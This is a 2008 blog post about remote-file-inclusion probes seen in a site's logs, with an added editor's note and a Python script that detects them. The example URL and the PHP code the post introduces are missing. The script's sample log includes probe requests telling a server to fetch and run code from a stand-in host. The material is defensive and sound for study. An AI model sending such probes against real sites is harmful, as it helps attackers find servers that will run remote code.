Ned Batchelder : Blog
The script kiddies that couldn't shoot straight
March 2008
One of the things I find entertaining about monitoring web sites is to see the trails of malware. Yesterday, there were a few attempts to request pages from our site with a query parameter added on, for example:
I visited that odd URL to see what I could find out, and discovered a plain text file containing PHP code. This is the code (formatted so I could read it):
I'm not sure what the heck is going on here. The script looks like it's trying to accept a command and execute it, except the command is hardcoded to "id". And what good does it do to hit my server with this URL in a ?p= parameter? Is there some vulnerability somewhere so that a server that is sent this URL will fetch this PHP and execute it? Is this part of a server-based virus? What good does it do if the command is always "id"? So many questions...
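Editor's note, added to this post and not part of the original: the shape of these requests is the standard remote file inclusion (RFI) probe. A PHP page that does something like include($_GET['p'] . '.php') will, on a server with remote includes enabled (allow_url_include, or allow_url_fopen on older PHP), fetch the attacker's text file over HTTP and execute it as PHP. The hardcoded "id" is a cheap yes/no test: if the response contains uid= output, the attacker knows the site executes remote code and comes back with a real payload. The script below is an added example of what a site owner watching their logs for this could run; it is not the post author's code. The log lines are constructed for the example (example.com is the pretend site, example.net the pretend payload host, and the "?p=" vector is the one the post describes; the other parameter names and the trailing "?" on the payload URL are assumptions about common practice, not something the post shows).

```python
"""Flag remote-file-inclusion (RFI) probes in web server access logs.

Added example for this post, not the author's own code. It looks for the
pattern the post describes: an ordinary page request carrying a ?p= query
parameter whose value is itself an absolute URL on another host. Everything
in SAMPLE_LOG is constructed for this example; the hosts are reserved names.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/nginx "combined" format: client IP, timestamp, request line, status,
# size, referer, user agent. Only the fields we use are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The post only saw ?p=; the other names are common include-style parameters,
# added here as an assumption about what a site might want to watch.
WATCHED_PARAMS = ("p", "page", "file", "include", "path")

# URL schemes PHP's include() will fetch when remote includes are enabled.
# (ftp:// and data:// work too; http(s) is what the probes in the wild use.)
REMOTE_SCHEMES = ("http", "https", "ftp")

# Constructed sample: three ordinary requests and two probes from one client.
# The trailing "?" on the payload URL is a common trick so that anything the
# vulnerable script appends (e.g. ".php") ends up in the attacker's query string.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2008:08:14:02 -0500] "GET /blog/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2008:08:14:05 -0500] "GET /blog/?p=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Mar/2008:09:30:11 -0500] "GET /blog/index.html?p=http://example.net/tmp/id.txt? HTTP/1.0" 200 5120 "-" "libwww-perl/5.805"
198.51.100.23 - - [10/Mar/2008:09:30:12 -0500] "GET /code/?p=http://example.net/tmp/id.txt%3F HTTP/1.0" 404 300 "-" "libwww-perl/5.805"
203.0.113.9 - - [10/Mar/2008:10:02:44 -0500] "GET /text/?p=https://example.com/blog/ HTTP/1.1" 200 900 "http://example.com/" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the named fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_candidates(target, watched=WATCHED_PARAMS):
    """Return (param, url) pairs where a watched query parameter holds an absolute URL."""
    query = urlsplit(target).query
    found = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name not in watched:
            continue
        for value in values:
            value = unquote(value)  # parse_qs decoded once; a second pass catches %253F-style double encoding
            u = urlsplit(value)
            if u.scheme in REMOTE_SCHEMES and u.netloc:
                found.append((name, value))
    return found


def scan(log_text, site_hosts=()):
    """One finding per RFI-looking request. 'foreign' is False when the URL points back at our own host."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, url in rfi_candidates(rec["target"]):
            host = urlsplit(url).hostname or ""
            findings.append({
                "ip": rec["ip"],
                "path": urlsplit(rec["target"]).path,
                "param": name,
                "url": url,
                "host": host,
                "foreign": host not in site_hosts,
                "status": rec["status"],
                "ua": rec["ua"],
            })
    return findings


def payload_hosts(findings):
    """Map each off-site payload host to the set of client IPs that pointed at it (the URLs worth going to look at)."""
    by_host = {}
    for f in findings:
        if f["foreign"]:
            by_host.setdefault(f["host"], set()).add(f["ip"])
    return by_host


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG, site_hosts=("example.com",))
    for f in hits:
        tag = "RFI probe" if f["foreign"] else "same-site URL"
        print(f'{tag}: {f["ip"]} -> {f["path"]} ?{f["param"]}= {f["url"]} ({f["status"]}, {f["ua"]})')
    for host, ips in payload_hosts(hits).items():
        print(f"payload host {host} used by {len(ips)} client(s): {', '.join(sorted(ips))}")
```

The same-site case is reported separately rather than dropped because a legitimate redirect-after-login or "return to" parameter can carry a full URL on your own host; the off-site hits are the ones to fetch (as the post's author did) and the ones to block at the web server if the site has no reason to accept URLs in that parameter. Note that a 200 on a probe only means the page rendered; whether the remote file actually got included depends on the page's code and PHP settings, which the log cannot tell you.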